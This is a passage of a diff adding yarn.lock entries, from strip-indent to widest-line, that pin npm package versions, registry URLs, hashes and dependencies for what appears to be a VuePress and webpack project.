+  version "2.0.0"
+  resolved "https://registry.yarnpkg.com/strip-indent/-/strip-indent-2.0.0.tgz#5ef8db295d01e6ed6cbf7aab96998d7822527b68"
+
+strip-json-comments@~2.0.1:
+  version "2.0.1"
+  resolved "https://registry.yarnpkg.com/strip-json-comments/-/strip-json-comments-2.0.1.tgz#3c531942e908c2697c0ec344858c286c7ca0a60a"
+
+stylus-loader@^3.0.2:
+  version "3.0.2"
+  resolved "https://registry.yarnpkg.com/stylus-loader/-/stylus-loader-3.0.2.tgz#27a706420b05a38e038e7cacb153578d450513c6"
+  dependencies:
+    loader-utils "^1.0.2"
+    lodash.clonedeep "^4.5.0"
+    when "~3.6.x"
+
+stylus@^0.54.5:
+  version "0.54.5"
+  resolved "https://registry.yarnpkg.com/stylus/-/stylus-0.54.5.tgz#42b9560931ca7090ce8515a798ba9e6aa3d6dc79"
+  dependencies:
+    css-parse "1.7.x"
+    debug "*"
+    glob "7.0.x"
+    mkdirp "0.5.x"
+    sax "0.5.x"
+    source-map "0.1.x"
+
+supports-color@^2.0.0:
+  version "2.0.0"
+  resolved "https://registry.yarnpkg.com/supports-color/-/supports-color-2.0.0.tgz#535d045ce6b6363fa40117084629995e9df324c7"
+
+supports-color@^3.2.3:
+  version "3.2.3"
+  resolved "https://registry.yarnpkg.com/supports-color/-/supports-color-3.2.3.tgz#65ac0504b3954171d8a64946b2ae3cbb8a5f54f6"
+  dependencies:
+    has-flag "^1.0.0"
+
+supports-color@^5.3.0, supports-color@^5.4.0:
+  version "5.4.0"
+  resolved "https://registry.yarnpkg.com/supports-color/-/supports-color-5.4.0.tgz#1c6b337402c2137605efe19f10fec390f6faab54"
+  dependencies:
+    has-flag "^3.0.0"
+
+svgo@^0.7.0:
+  version "0.7.2"
+  resolved "https://registry.yarnpkg.com/svgo/-/svgo-0.7.2.tgz#9f5772413952135c6fefbf40afe6a4faa88b4bb5"
+  dependencies:
+    coa "~1.0.1"
+    colors "~1.1.2"
+    csso "~2.3.1"
+    js-yaml "~3.7.0"
+    mkdirp "~0.5.1"
+    sax "~1.2.1"
+    whet.extend "~0.9.9"
+
+table@^4.0.3:
+  version "4.0.3"
+  resolved "https://registry.yarnpkg.com/table/-/table-4.0.3.tgz#00b5e2b602f1794b9acaf9ca908a76386a7813bc"
+  dependencies:
+    ajv "^6.0.1"
+    ajv-keywords "^3.0.0"
+    chalk "^2.1.0"
+    lodash "^4.17.4"
+    slice-ansi "1.0.0"
+    string-width "^2.1.1"
+
+tapable@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/tapable/-/tapable-1.0.0.tgz#cbb639d9002eed9c6b5975eb20598d7936f1f9f2"
+
+tar@^4:
+  version "4.4.4"
+  resolved "https://registry.yarnpkg.com/tar/-/tar-4.4.4.tgz#ec8409fae9f665a4355cc3b4087d0820232bb8cd"
+  dependencies:
+    chownr "^1.0.1"
+    fs-minipass "^1.2.5"
+    minipass "^2.3.3"
+    minizlib "^1.1.0"
+    mkdirp "^0.5.0"
+    safe-buffer "^5.1.2"
+    yallist "^3.0.2"
+
+term-size@^1.2.0:
+  version "1.2.0"
+  resolved "https://registry.yarnpkg.com/term-size/-/term-size-1.2.0.tgz#458b83887f288fc56d6fffbfad262e26638efa69"
+  dependencies:
+    execa "^0.7.0"
+
+text-table@^0.2.0:
+  version "0.2.0"
+  resolved "https://registry.yarnpkg.com/text-table/-/text-table-0.2.0.tgz#7f5ee823ae805207c00af2df4a84ec3fcfa570b4"
+
+thenify-all@^1.0.0:
+  version "1.6.0"
+  resolved "https://registry.yarnpkg.com/thenify-all/-/thenify-all-1.6.0.tgz#1a1918d402d8fc3f98fbf234db0bcc8cc10e9726"
+  dependencies:
+    thenify ">= 3.1.0 < 4"
+
+"thenify@>= 3.1.0 < 4":
+  version "3.3.0"
+  resolved "https://registry.yarnpkg.com/thenify/-/thenify-3.3.0.tgz#e69e38a1babe969b0108207978b9f62b88604839"
+  dependencies:
+    any-promise "^1.0.0"
+
+through2@^2.0.0:
+  version "2.0.3"
+  resolved "https://registry.yarnpkg.com/through2/-/through2-2.0.3.tgz#0004569b37c7c74ba39c43f3ced78d1ad94140be"
+  dependencies:
+    readable-stream "^2.1.5"
+    xtend "~4.0.1"
+
+through@~2.3.4:
+  version "2.3.8"
+  resolved "https://registry.yarnpkg.com/through/-/through-2.3.8.tgz#0dd4c9ffaabc357960b1b724115d7e0e86a2e1f5"
+
+time-fix-plugin@^2.0.0:
+  version "2.0.3"
+  resolved "https://registry.yarnpkg.com/time-fix-plugin/-/time-fix-plugin-2.0.3.tgz#b6b1ead519099bc621e28edb77dac7531918b7e1"
+
+timed-out@^4.0.0:
+  version "4.0.1"
+  resolved "https://registry.yarnpkg.com/timed-out/-/timed-out-4.0.1.tgz#f32eacac5a175bea25d7fab565ab3ed8741ef56f"
+
+timers-browserify@^2.0.4:
+  version "2.0.10"
+  resolved "https://registry.yarnpkg.com/timers-browserify/-/timers-browserify-2.0.10.tgz#1d28e3d2aadf1d5a5996c4e9f95601cd053480ae"
+  dependencies:
+    setimmediate "^1.0.4"
+
+tiny-emitter@^2.0.0:
+  version "2.0.2"
+  resolved "https://registry.yarnpkg.com/tiny-emitter/-/tiny-emitter-2.0.2.tgz#82d27468aca5ade8e5fd1e6d22b57dd43ebdfb7c"
+
+to-arraybuffer@^1.0.0:
+  version "1.0.1"
+  resolved "https://registry.yarnpkg.com/to-arraybuffer/-/to-arraybuffer-1.0.1.tgz#7d229b1fcc637e466ca081180836a7aabff83f43"
+
+to-factory@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/to-factory/-/to-factory-1.0.0.tgz#8738af8bd97120ad1d4047972ada5563bf9479b1"
+
+to-fast-properties@^2.0.0:
+  version "2.0.0"
+  resolved "https://registry.yarnpkg.com/to-fast-properties/-/to-fast-properties-2.0.0.tgz#dc5e698cbd079265bc73e0377681a4e4e83f616e"
+
+to-object-path@^0.3.0:
+  version "0.3.0"
+  resolved "https://registry.yarnpkg.com/to-object-path/-/to-object-path-0.3.0.tgz#297588b7b0e7e0ac08e04e672f85c1f4999e17af"
+  dependencies:
+    kind-of "^3.0.2"
+
+to-regex-range@^2.1.0:
+  version "2.1.1"
+  resolved "https://registry.yarnpkg.com/to-regex-range/-/to-regex-range-2.1.1.tgz#7c80c17b9dfebe599e27367e0d4dd5590141db38"
+  dependencies:
+    is-number "^3.0.0"
+    repeat-string "^1.6.1"
+
+to-regex@^3.0.1, to-regex@^3.0.2:
+  version "3.0.2"
+  resolved "https://registry.yarnpkg.com/to-regex/-/to-regex-3.0.2.tgz#13cfdd9b336552f30b51f33a8ae1b42a7a7599ce"
+  dependencies:
+    define-property "^2.0.2"
+    extend-shallow "^3.0.2"
+    regex-not "^1.0.2"
+    safe-regex "^1.1.0"
+
+toml@^2.3.3:
+  version "2.3.3"
+  resolved "https://registry.yarnpkg.com/toml/-/toml-2.3.3.tgz#8d683d729577cb286231dfc7a8affe58d31728fb"
+
+topo@2.x.x:
+  version "2.0.2"
+  resolved "https://registry.yarnpkg.com/topo/-/topo-2.0.2.tgz#cd5615752539057c0dc0491a621c3bc6fbe1d182"
+  dependencies:
+    hoek "4.x.x"
+
+toposort@^1.0.0:
+  version "1.0.7"
+  resolved "https://registry.yarnpkg.com/toposort/-/toposort-1.0.7.tgz#2e68442d9f64ec720b8cc89e6443ac6caa950029"
+
+trim-newlines@^2.0.0:
+  version "2.0.0"
+  resolved "https://registry.yarnpkg.com/trim-newlines/-/trim-newlines-2.0.0.tgz#b403d0b91be50c331dfc4b82eeceb22c3de16d20"
+
+trim-right@^1.0.1:
+  version "1.0.1"
+  resolved "https://registry.yarnpkg.com/trim-right/-/trim-right-1.0.1.tgz#cb2e1203067e0c8de1f614094b9fe45704ea6003"
+
+tslib@^1.9.0:
+  version "1.9.3"
+  resolved "https://registry.yarnpkg.com/tslib/-/tslib-1.9.3.tgz#d7e4dd79245d85428c4d7e4822a79917954ca286"
+
+tty-browserify@0.0.0:
+  version "0.0.0"
+  resolved "https://registry.yarnpkg.com/tty-browserify/-/tty-browserify-0.0.0.tgz#a157ba402da24e9bf957f9aa69d524eed42901a6"
+
+tunnel-agent@^0.6.0:
+  version "0.6.0"
+  resolved "https://registry.yarnpkg.com/tunnel-agent/-/tunnel-agent-0.6.0.tgz#27a5dea06b36b04a0a9966774b290868f0fc40fd"
+  dependencies:
+    safe-buffer "^5.0.1"
+
+type-is@^1.5.5:
+  version "1.6.16"
+  resolved "https://registry.yarnpkg.com/type-is/-/type-is-1.6.16.tgz#f89ce341541c672b25ee7ae3c73dee3b2be50194"
+  dependencies:
+    media-typer "0.3.0"
+    mime-types "~2.1.18"
+
+typedarray@^0.0.6:
+  version "0.0.6"
+  resolved "https://registry.yarnpkg.com/typedarray/-/typedarray-0.0.6.tgz#867ac74e3864187b1d3d47d996a78ec5c8830777"
+
+uc.micro@^1.0.1, uc.micro@^1.0.5:
+  version "1.0.5"
+  resolved "https://registry.yarnpkg.com/uc.micro/-/uc.micro-1.0.5.tgz#0c65f15f815aa08b560a61ce8b4db7ffc3f45376"
+
+uglify-es@^3.3.4:
+  version "3.3.9"
+  resolved "https://registry.yarnpkg.com/uglify-es/-/uglify-es-3.3.9.tgz#0c1c4f0700bed8dbc124cdb304d2592ca203e677"
+  dependencies:
+    commander "~2.13.0"
+    source-map "~0.6.1"
+
+uglify-js@3.3.x:
+  version "3.3.28"
+  resolved "https://registry.yarnpkg.com/uglify-js/-/uglify-js-3.3.28.tgz#0efb9a13850e11303361c1051f64d2ec68d9be06"
+  dependencies:
+    commander "~2.15.0"
+    source-map "~0.6.1"
+
+uglifyjs-webpack-plugin@^1.2.4:
+  version "1.2.6"
+  resolved "https://registry.yarnpkg.com/uglifyjs-webpack-plugin/-/uglifyjs-webpack-plugin-1.2.6.tgz#f4bb44f02431e82b301d8d4624330a6a35729381"
+  dependencies:
+    cacache "^10.0.4"
+    find-cache-dir "^1.0.0"
+    schema-utils "^0.4.5"
+    serialize-javascript "^1.4.0"
+    source-map "^0.6.1"
+    uglify-es "^3.3.4"
+    webpack-sources "^1.1.0"
+    worker-farm "^1.5.2"
+
+unicode-canonical-property-names-ecmascript@^1.0.4:
+  version "1.0.4"
+  resolved "https://registry.yarnpkg.com/unicode-canonical-property-names-ecmascript/-/unicode-canonical-property-names-ecmascript-1.0.4.tgz#2619800c4c825800efdd8343af7dd9933cbe2818"
+
+unicode-match-property-ecmascript@^1.0.4:
+  version "1.0.4"
+  resolved "https://registry.yarnpkg.com/unicode-match-property-ecmascript/-/unicode-match-property-ecmascript-1.0.4.tgz#8ed2a32569961bce9227d09cd3ffbb8fed5f020c"
+  dependencies:
+    unicode-canonical-property-names-ecmascript "^1.0.4"
+    unicode-property-aliases-ecmascript "^1.0.4"
+
+unicode-match-property-value-ecmascript@^1.0.2:
+  version "1.0.2"
+  resolved "https://registry.yarnpkg.com/unicode-match-property-value-ecmascript/-/unicode-match-property-value-ecmascript-1.0.2.tgz#9f1dc76926d6ccf452310564fd834ace059663d4"
+
+unicode-property-aliases-ecmascript@^1.0.4:
+  version "1.0.4"
+  resolved "https://registry.yarnpkg.com/unicode-property-aliases-ecmascript/-/unicode-property-aliases-ecmascript-1.0.4.tgz#5a533f31b4317ea76f17d807fa0d116546111dd0"
+
+union-value@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/union-value/-/union-value-1.0.0.tgz#5c71c34cb5bad5dcebe3ea0cd08207ba5aa1aea4"
+  dependencies:
+    arr-union "^3.1.0"
+    get-value "^2.0.6"
+    is-extendable "^0.1.1"
+    set-value "^0.4.3"
+
+uniq@^1.0.1:
+  version "1.0.1"
+  resolved "https://registry.yarnpkg.com/uniq/-/uniq-1.0.1.tgz#b31c5ae8254844a3a8281541ce2b04b865a734ff"
+
+uniqs@^2.0.0:
+  version "2.0.0"
+  resolved "https://registry.yarnpkg.com/uniqs/-/uniqs-2.0.0.tgz#ffede4b36b25290696e6e165d4a59edb998e6b02"
+
+unique-filename@^1.1.0:
+  version "1.1.0"
+  resolved "https://registry.yarnpkg.com/unique-filename/-/unique-filename-1.1.0.tgz#d05f2fe4032560871f30e93cbe735eea201514f3"
+  dependencies:
+    unique-slug "^2.0.0"
+
+unique-slug@^2.0.0:
+  version "2.0.0"
+  resolved "https://registry.yarnpkg.com/unique-slug/-/unique-slug-2.0.0.tgz#db6676e7c7cc0629878ff196097c78855ae9f4ab"
+  dependencies:
+    imurmurhash "^0.1.4"
+
+unique-string@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/unique-string/-/unique-string-1.0.0.tgz#9e1057cca851abb93398f8b33ae187b99caec11a"
+  dependencies:
+    crypto-random-string "^1.0.0"
+
+universalify@^0.1.0:
+  version "0.1.2"
+  resolved "https://registry.yarnpkg.com/universalify/-/universalify-0.1.2.tgz#b646f69be3942dabcecc9d6639c80dc105efaa66"
+
+unset-value@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/unset-value/-/unset-value-1.0.0.tgz#8376873f7d2335179ffb1e6fc3a8ed0dfc8ab559"
+  dependencies:
+    has-value "^0.3.1"
+    isobject "^3.0.0"
+
+unzip-response@^2.0.1:
+  version "2.0.1"
+  resolved "https://registry.yarnpkg.com/unzip-response/-/unzip-response-2.0.1.tgz#d2f0f737d16b0615e72a6935ed04214572d56f97"
+
+upath@^1.0.5:
+  version "1.1.0"
+  resolved "https://registry.yarnpkg.com/upath/-/upath-1.1.0.tgz#35256597e46a581db4793d0ce47fa9aebfc9fabd"
+
+update-notifier@^2.3.0:
+  version "2.5.0"
+  resolved "https://registry.yarnpkg.com/update-notifier/-/update-notifier-2.5.0.tgz#d0744593e13f161e406acb1d9408b72cad08aff6"
+  dependencies:
+    boxen "^1.2.1"
+    chalk "^2.0.1"
+    configstore "^3.0.0"
+    import-lazy "^2.1.0"
+    is-ci "^1.0.10"
+    is-installed-globally "^0.1.0"
+    is-npm "^1.0.0"
+    latest-version "^3.0.0"
+    semver-diff "^2.0.0"
+    xdg-basedir "^3.0.0"
+
+upper-case@^1.1.1:
+  version "1.1.3"
+  resolved "https://registry.yarnpkg.com/upper-case/-/upper-case-1.1.3.tgz#f6b4501c2ec4cdd26ba78be7222961de77621598"
+
+uri-js@^4.2.1:
+  version "4.2.2"
+  resolved "https://registry.yarnpkg.com/uri-js/-/uri-js-4.2.2.tgz#94c540e1ff772956e2299507c010aea6c8838eb0"
+  dependencies:
+    punycode "^2.1.0"
+
+urix@^0.1.0:
+  version "0.1.0"
+  resolved "https://registry.yarnpkg.com/urix/-/urix-0.1.0.tgz#da937f7a62e21fec1fd18d49b35c2935067a6c72"
+
+url-join@3.0.0:
+  version "3.0.0"
+  resolved "https://registry.yarnpkg.com/url-join/-/url-join-3.0.0.tgz#26e8113ace195ea30d0fc38186e45400f9cea672"
+
+url-join@^4.0.0:
+  version "4.0.0"
+  resolved "https://registry.yarnpkg.com/url-join/-/url-join-4.0.0.tgz#4d3340e807d3773bda9991f8305acdcc2a665d2a"
+
+url-loader@^1.0.1:
+  version "1.0.1"
+  resolved "https://registry.yarnpkg.com/url-loader/-/url-loader-1.0.1.tgz#61bc53f1f184d7343da2728a1289ef8722ea45ee"
+  dependencies:
+    loader-utils "^1.1.0"
+    mime "^2.0.3"
+    schema-utils "^0.4.3"
+
+url-parse-lax@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/url-parse-lax/-/url-parse-lax-1.0.0.tgz#7af8f303645e9bd79a272e7a14ac68bc0609da73"
+  dependencies:
+    prepend-http "^1.0.1"
+
+url@^0.11.0:
+  version "0.11.0"
+  resolved "https://registry.yarnpkg.com/url/-/url-0.11.0.tgz#3838e97cfc60521eb73c525a8e55bfdd9e2e28f1"
+  dependencies:
+    punycode "1.3.2"
+    querystring "0.2.0"
+
+use@^3.1.0:
+  version "3.1.0"
+  resolved "https://registry.yarnpkg.com/use/-/use-3.1.0.tgz#14716bf03fdfefd03040aef58d8b4b85f3a7c544"
+  dependencies:
+    kind-of "^6.0.2"
+
+util-deprecate@~1.0.1:
+  version "1.0.2"
+  resolved "https://registry.yarnpkg.com/util-deprecate/-/util-deprecate-1.0.2.tgz#450d4dc9fa70de732762fbd2d4a28981419a0ccf"
+
+util.promisify@1.0.0, util.promisify@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/util.promisify/-/util.promisify-1.0.0.tgz#440f7165a459c9a16dc145eb8e72f35687097030"
+  dependencies:
+    define-properties "^1.1.2"
+    object.getownpropertydescriptors "^2.0.3"
+
+util@0.10.3:
+  version "0.10.3"
+  resolved "https://registry.yarnpkg.com/util/-/util-0.10.3.tgz#7afb1afe50805246489e3db7fe0ed379336ac0f9"
+  dependencies:
+    inherits "2.0.1"
+
+util@^0.10.3:
+  version "0.10.4"
+  resolved "https://registry.yarnpkg.com/util/-/util-0.10.4.tgz#3aa0125bfe668a4672de58857d3ace27ecb76901"
+  dependencies:
+    inherits "2.0.3"
+
+utila@~0.3:
+  version "0.3.3"
+  resolved "https://registry.yarnpkg.com/utila/-/utila-0.3.3.tgz#d7e8e7d7e309107092b05f8d9688824d633a4226"
+
+utila@~0.4:
+  version "0.4.0"
+  resolved "https://registry.yarnpkg.com/utila/-/utila-0.4.0.tgz#8a16a05d445657a3aea5eecc5b12a4fa5379772c"
+
+uuid@^3.1.0:
+  version "3.2.1"
+  resolved "https://registry.yarnpkg.com/uuid/-/uuid-3.2.1.tgz#12c528bb9d58d0b9265d9a2f6f0fe8be17ff1f14"
+
+v8-compile-cache@^2.0.0:
+  version "2.0.0"
+  resolved "https://registry.yarnpkg.com/v8-compile-cache/-/v8-compile-cache-2.0.0.tgz#526492e35fc616864284700b7043e01baee09f0a"
+
+validate-npm-package-license@^3.0.1:
+  version "3.0.3"
+  resolved "https://registry.yarnpkg.com/validate-npm-package-license/-/validate-npm-package-license-3.0.3.tgz#81643bcbef1bdfecd4623793dc4648948ba98338"
+  dependencies:
+    spdx-correct "^3.0.0"
+    spdx-expression-parse "^3.0.0"
+
+vary@^1.0.0:
+  version "1.1.2"
+  resolved "https://registry.yarnpkg.com/vary/-/vary-1.1.2.tgz#2299f02c6ded30d4a5961b0b9f74524a18f634fc"
+
+vendors@^1.0.0:
+  version "1.0.2"
+  resolved "https://registry.yarnpkg.com/vendors/-/vendors-1.0.2.tgz#7fcb5eef9f5623b156bcea89ec37d63676f21801"
+
+vm-browserify@0.0.4:
+  version "0.0.4"
+  resolved "https://registry.yarnpkg.com/vm-browserify/-/vm-browserify-0.0.4.tgz#5d7ea45bbef9e4a6ff65f95438e0a87c357d5a73"
+  dependencies:
+    indexof "0.0.1"
+
+vue-hot-reload-api@^2.3.0:
+  version "2.3.0"
+  resolved "https://registry.yarnpkg.com/vue-hot-reload-api/-/vue-hot-reload-api-2.3.0.tgz#97976142405d13d8efae154749e88c4e358cf926"
+
+vue-loader@^15.2.4:
+  version "15.2.4"
+  resolved "https://registry.yarnpkg.com/vue-loader/-/vue-loader-15.2.4.tgz#a7b923123d3cf87230a8ff54a1c16d31a6c5dbb4"
+  dependencies:
+    "@vue/component-compiler-utils" "^1.2.1"
+    hash-sum "^1.0.2"
+    loader-utils "^1.1.0"
+    vue-hot-reload-api "^2.3.0"
+    vue-style-loader "^4.1.0"
+
+vue-router@^3.0.1:
+  version "3.0.1"
+  resolved "https://registry.yarnpkg.com/vue-router/-/vue-router-3.0.1.tgz#d9b05ad9c7420ba0f626d6500d693e60092cc1e9"
+
+vue-server-renderer@^2.5.16:
+  version "2.5.16"
+  resolved "https://registry.yarnpkg.com/vue-server-renderer/-/vue-server-renderer-2.5.16.tgz#279ef8e37e502a0de3a9ae30758cc04a472eaac0"
+  dependencies:
+    chalk "^1.1.3"
+    hash-sum "^1.0.2"
+    he "^1.1.0"
+    lodash.template "^4.4.0"
+    lodash.uniq "^4.5.0"
+    resolve "^1.2.0"
+    serialize-javascript "^1.3.0"
+    source-map "0.5.6"
+
+vue-style-loader@^4.1.0:
+  version "4.1.0"
+  resolved "https://registry.yarnpkg.com/vue-style-loader/-/vue-style-loader-4.1.0.tgz#7588bd778e2c9f8d87bfc3c5a4a039638da7a863"
+  dependencies:
+    hash-sum "^1.0.2"
+    loader-utils "^1.0.2"
+
+vue-template-compiler@^2.5.16:
+  version "2.5.16"
+  resolved "https://registry.yarnpkg.com/vue-template-compiler/-/vue-template-compiler-2.5.16.tgz#93b48570e56c720cdf3f051cc15287c26fbd04cb"
+  dependencies:
+    de-indent "^1.0.2"
+    he "^1.1.0"
+
+vue-template-es2015-compiler@^1.6.0:
+  version "1.6.0"
+  resolved "https://registry.yarnpkg.com/vue-template-es2015-compiler/-/vue-template-es2015-compiler-1.6.0.tgz#dc42697133302ce3017524356a6c61b7b69b4a18"
+
+vue@^2.5.16:
+  version "2.5.16"
+  resolved "https://registry.yarnpkg.com/vue/-/vue-2.5.16.tgz#07edb75e8412aaeed871ebafa99f4672584a0085"
+
+vuepress-html-webpack-plugin@^3.2.0:
+  version "3.2.0"
+  resolved "https://registry.yarnpkg.com/vuepress-html-webpack-plugin/-/vuepress-html-webpack-plugin-3.2.0.tgz#219be272ad510faa8750d2d4e70fd028bfd1c16e"
+  dependencies:
+    html-minifier "^3.2.3"
+    loader-utils "^0.2.16"
+    lodash "^4.17.3"
+    pretty-error "^2.0.2"
+    tapable "^1.0.0"
+    toposort "^1.0.0"
+    util.promisify "1.0.0"
+
+vuepress@^0.10.2:
+  version "0.10.2"
+  resolved "https://registry.yarnpkg.com/vuepress/-/vuepress-0.10.2.tgz#4f1cd6126619f7a94ab1b08caacdf6d91c52954f"
+  dependencies:
+    "@babel/core" "7.0.0-beta.47"
+    "@vue/babel-preset-app" "3.0.0-beta.11"
+    autoprefixer "^8.2.0"
+    babel-loader "8.0.0-beta.3"
+    cache-loader "^1.2.2"
+    chalk "^2.3.2"
+    chokidar "^2.0.3"
+    commander "^2.15.1"
+    connect-history-api-fallback "^1.5.0"
+    copy-webpack-plugin "^4.5.1"
+    cross-spawn "^6.0.5"
+    css-loader "^0.28.11"
+    diacritics "^1.3.0"
+    docsearch.js "^2.5.2"
+    escape-html "^1.0.3"
+    file-loader "^1.1.11"
+    fs-extra "^5.0.0"
+    globby "^8.0.1"
+    gray-matter "^4.0.1"
+    js-yaml "^3.11.0"
+    koa-connect "^2.0.1"
+    koa-mount "^3.0.0"
+    koa-range "^0.3.0"
+    koa-static "^4.0.2"
+    loader-utils "^1.1.0"
+    lodash.throttle "^4.1.1"
+    lru-cache "^4.1.2"
+    markdown-it "^8.4.1"
+    markdown-it-anchor "^4.0.0"
+    markdown-it-container "^2.0.0"
+    markdown-it-emoji "^1.4.0"
+    markdown-it-table-of-contents "^0.3.3"
+    mini-css-extract-plugin "^0.4.0"
+    nprogress "^0.2.0"
+    optimize-css-assets-webpack-plugin "^4.0.0"
+    portfinder "^1.0.13"
+    postcss-loader "^2.1.5"
+    prismjs "^1.13.0"
+    register-service-worker "^1.2.0"
+    semver "^5.5.0"
+    stylus "^0.54.5"
+    stylus-loader "^3.0.2"
+    toml "^2.3.3"
+    url-loader "^1.0.1"
+    vue "^2.5.16"
+    vue-loader "^15.2.4"
+    vue-router "^3.0.1"
+    vue-server-renderer "^2.5.16"
+    vue-template-compiler "^2.5.16"
+    vuepress-html-webpack-plugin "^3.2.0"
+    webpack "^4.8.1"
+    webpack-chain "^4.6.0"
+    webpack-merge "^4.1.2"
+    webpack-serve "^1.0.2"
+    webpackbar "^2.6.1"
+    workbox-build "^3.1.0"
+
+watchpack@^1.5.0:
+  version "1.6.0"
+  resolved "https://registry.yarnpkg.com/watchpack/-/watchpack-1.6.0.tgz#4bc12c2ebe8aa277a71f1d3f14d685c7b446cd00"
+  dependencies:
+    chokidar "^2.0.2"
+    graceful-fs "^4.1.2"
+    neo-async "^2.5.0"
+
+webpack-chain@^4.6.0:
+  version "4.8.0"
+  resolved "https://registry.yarnpkg.com/webpack-chain/-/webpack-chain-4.8.0.tgz#06fc3dbb9f2707d4c9e899fc6250fbcf2afe6fd1"
+  dependencies:
+    deepmerge "^1.5.2"
+    javascript-stringify "^1.6.0"
+
+webpack-dev-middleware@^3.0.0:
+  version "3.1.3"
+  resolved "https://registry.yarnpkg.com/webpack-dev-middleware/-/webpack-dev-middleware-3.1.3.tgz#8b32aa43da9ae79368c1bf1183f2b6cf5e1f39ed"
+  dependencies:
+    loud-rejection "^1.6.0"
+    memory-fs "~0.4.1"
+    mime "^2.1.0"
+    path-is-absolute "^1.0.0"
+    range-parser "^1.0.3"
+    url-join "^4.0.0"
+    webpack-log "^1.0.1"
+
+webpack-hot-client@^3.0.0:
+  version "3.0.0"
+  resolved "https://registry.yarnpkg.com/webpack-hot-client/-/webpack-hot-client-3.0.0.tgz#b714f257a264001275bc1491741685779cde12f2"
+  dependencies:
+    json-stringify-safe "^5.0.1"
+    loglevelnext "^1.0.2"
+    strip-ansi "^4.0.0"
+    uuid "^3.1.0"
+    webpack-log "^1.1.1"
+    ws "^4.0.0"
+
+webpack-log@^1.0.1, webpack-log@^1.1.1, webpack-log@^1.1.2:
+  version "1.2.0"
+  resolved "https://registry.yarnpkg.com/webpack-log/-/webpack-log-1.2.0.tgz#a4b34cda6b22b518dbb0ab32e567962d5c72a43d"
+  dependencies:
+    chalk "^2.1.0"
+    log-symbols "^2.1.0"
+    loglevelnext "^1.0.1"
+    uuid "^3.1.0"
+
+webpack-merge@^4.1.2:
+  version "4.1.3"
+  resolved "https://registry.yarnpkg.com/webpack-merge/-/webpack-merge-4.1.3.tgz#8aaff2108a19c29849bc9ad2a7fd7fce68e87c4a"
+  dependencies:
+    lodash "^4.17.5"
+
+webpack-serve@^1.0.2:
+  version "1.0.4"
+  resolved "https://registry.yarnpkg.com/webpack-serve/-/webpack-serve-1.0.4.tgz#d1c83955926969ba195e5032f978da92ef07829c"
+  dependencies:
+    "@shellscape/koa-static" "^4.0.4"
+    "@webpack-contrib/config-loader" "^1.1.1"
+    chalk "^2.3.0"
+    clipboardy "^1.2.2"
+    cosmiconfig "^5.0.2"
+    debug "^3.1.0"
+    find-up "^2.1.0"
+    get-port "^3.2.0"
+    import-local "^1.0.0"
+    killable "^1.0.0"
+    koa "^2.4.1"
+    koa-webpack "^4.0.0"
+    lodash "^4.17.5"
+    loud-rejection "^1.6.0"
+    meow "^5.0.0"
+    nanobus "^4.3.1"
+    opn "^5.1.0"
+    resolve "^1.6.0"
+    time-fix-plugin "^2.0.0"
+    update-notifier "^2.3.0"
+    url-join "3.0.0"
+    v8-compile-cache "^2.0.0"
+    webpack-hot-client "^3.0.0"
+    webpack-log "^1.1.2"
+
+webpack-sources@^1.0.1, webpack-sources@^1.1.0:
+  version "1.1.0"
+  resolved "https://registry.yarnpkg.com/webpack-sources/-/webpack-sources-1.1.0.tgz#a101ebae59d6507354d71d8013950a3a8b7a5a54"
+  dependencies:
+    source-list-map "^2.0.0"
+    source-map "~0.6.1"
+
+webpack@^4.8.1:
+  version "4.12.0"
+  resolved "https://registry.yarnpkg.com/webpack/-/webpack-4.12.0.tgz#14758e035ae69747f68dd0edf3c5a572a82bdee9"
+  dependencies:
+    "@webassemblyjs/ast" "1.5.12"
+    "@webassemblyjs/helper-module-context" "1.5.12"
+    "@webassemblyjs/wasm-edit" "1.5.12"
+    "@webassemblyjs/wasm-opt" "1.5.12"
+    "@webassemblyjs/wasm-parser" "1.5.12"
+    acorn "^5.6.2"
+    acorn-dynamic-import "^3.0.0"
+    ajv "^6.1.0"
+    ajv-keywords "^3.1.0"
+    chrome-trace-event "^1.0.0"
+    enhanced-resolve "^4.0.0"
+    eslint-scope "^3.7.1"
+    json-parse-better-errors "^1.0.2"
+    loader-runner "^2.3.0"
+    loader-utils "^1.1.0"
+    memory-fs "~0.4.1"
+    micromatch "^3.1.8"
+    mkdirp "~0.5.0"
+    neo-async "^2.5.0"
+    node-libs-browser "^2.0.0"
+    schema-utils "^0.4.4"
+    tapable "^1.0.0"
+    uglifyjs-webpack-plugin "^1.2.4"
+    watchpack "^1.5.0"
+    webpack-sources "^1.0.1"
+
+webpackbar@^2.6.1:
+  version "2.6.1"
+  resolved "https://registry.yarnpkg.com/webpackbar/-/webpackbar-2.6.1.tgz#d1aff0665c43635ff35672be2f2463d1176bdb6f"
+  dependencies:
+    chalk "^2.3.2"
+    consola "^1.2.0"
+    figures "^2.0.0"
+    loader-utils "^1.1.0"
+    lodash "^4.17.5"
+    log-update "^2.3.0"
+    pretty-time "^1.0.0"
+    schema-utils "^0.4.5"
+    std-env "^1.3.0"
+    table "^4.0.3"
+
+when@~3.6.x:
+  version "3.6.4"
+  resolved "https://registry.yarnpkg.com/when/-/when-3.6.4.tgz#473b517ec159e2b85005497a13983f095412e34e"
+
+whet.extend@~0.9.9:
+  version "0.9.9"
+  resolved "https://registry.yarnpkg.com/whet.extend/-/whet.extend-0.9.9.tgz#f877d5bf648c97e5aa542fadc16d6a259b9c11a1"
+
+which@^1.2.9:
+  version "1.3.1"
+  resolved "https://registry.yarnpkg.com/which/-/which-1.3.1.tgz#a45043d54f5805316da8d62f9f50918d3da70b0a"
+  dependencies:
+    isexe "^2.0.0"
+
+wide-align@^1.1.0:
+  version "1.1.3"
+  resolved "https://registry.yarnpkg.com/wide-align/-/wide-align-1.1.3.tgz#ae074e6bdc0c14a431e804e624549c633b000457"
+  dependencies:
+    string-width "^1.0.2 || 2"
+
+widest-line@^2.0.0:
+  version "2.0.0"
+  resolved "https://registry.yarnpkg.com/widest-line/-/widest-line-2.0.0.tgz#0142a4e8a243f8882c0233aa0e0281aa76152273"
+  dependencies:
+    string-width "^2.1.1"
+
